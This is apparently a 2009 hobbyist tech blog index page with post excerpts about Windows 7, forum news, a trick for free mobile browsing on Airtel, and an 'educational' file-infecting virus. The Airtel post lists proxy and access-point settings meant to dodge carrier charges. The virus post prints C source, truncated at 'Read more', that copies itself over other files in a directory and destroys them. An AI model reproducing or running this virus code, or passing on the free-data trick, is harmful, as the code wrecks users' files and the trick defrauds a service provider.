Arcane Network
Navigation
Login
Search
Your IP
Entries archive
Keep Visiting

Thursday, 2024-03-28, 7:42 PM

ARCANE


Welcome Guest
Arcane Blog & Videos
1 2 3 ... 6 7 »
This is a cool trick to surf the net on your airtel phone without being charged a single penny. But you cannot download anything, just surfing (certain pay sites cannot be surfed).

YOU NEED TO HAVE ZERO BALANCE IN YOUR CELLPHONE!!

First activate GPRS  on your airtel phone  by calling  121  and talk to the customer care executive and ask him to activate your GPRS<< its free >>
Then create a new web account on your phone from settings>>configuration in your Nokia phone. The setting should have the following details:
homepage>> http://www.google.co.in
Access Point>> airtelfun.com
Prosy>> 100.1.200.99
Proxy port>> 8080
username>> "leave it blank"
password>> "leave it blank"

(if you are having problem regarding creating a web account in your cellphone you can drop a question at the forums)

Then access the homepage i.e. google and then search for anything you wish and click on the results to view it without being charged.
ENJOY.
Views: 913 | Added by: KUSH-al-H@CK3R | Date: 2009-11-03

“Windows 7 will be vista but a whole lot better.”
I still remember those words by Mr. Steve Ballmer, CEO Microsoft said in the ITxpo.
While Windows 7 has only now launched, it barely feels like that. This time Microsoft has involved testers in such an extensive way, that for many people Windows 7 is already a familiar experience, after all, it has been around for nearly a year.

Windows 7 has changed little since its first beta release back in January 2009, which is all the more remarkable as it means that the operating system was nearly done by then. They have abandoned the search for a clever name, and gone for a clever operating system instead!

The biggest advantage of the extended public beta testing period of Windows 7 has been to the people who "tested" it, and essentially got a free licensed version of Windows for a year. However a lot of the feedback and bugs discovered during the beta period of Windows 7 was actually accommodated into Release Candidate which came afterwards.
 
While Windows 7 is essentially a minor update to Windows Vista, it has some significant and positive changes which have turned the utter failure of Vista to the critical acclaim it has received. Nearly every version of Windows has been considered to be too bloated for its time, and for the very first ... Read more »
Views: 1042 | Added by: KUSH-al-H@CK3R | Date: 2009-10-31

Yipppeeeeeeee!!!! The Arcane Forum has been rated the 3rd best forum in the whole of Ucoz network. We have just started the website but we are hoping that it will flourish if you guys support us.


Views: 3308 | Added by: KUSH-al-H@CK3R | Date: 2009-10-27

The OS Giant Microsoft finally launched its latest OS Windows 7 on 22nd October. Here are a few photographs from the launch event.

Views: 1000 | Added by: KUSH-al-H@CK3R | Date: 2009-10-25

****WARNING: FOR EDUCATIONAL PURPOSES ONLY****

This is a short c program which shows the working and infecting procedure of a virus. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the code of the virus program.


[Thanks to Srikanth who pointed out an error in the program and helped me to compile it successfully]
 

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus ... Read more »

Views: 896 | Added by: KUSH-al-H@CK3R | Date: 2009-10-18

Copyright Arcane Network © 2024 | $POWERED_BY CK-Computers$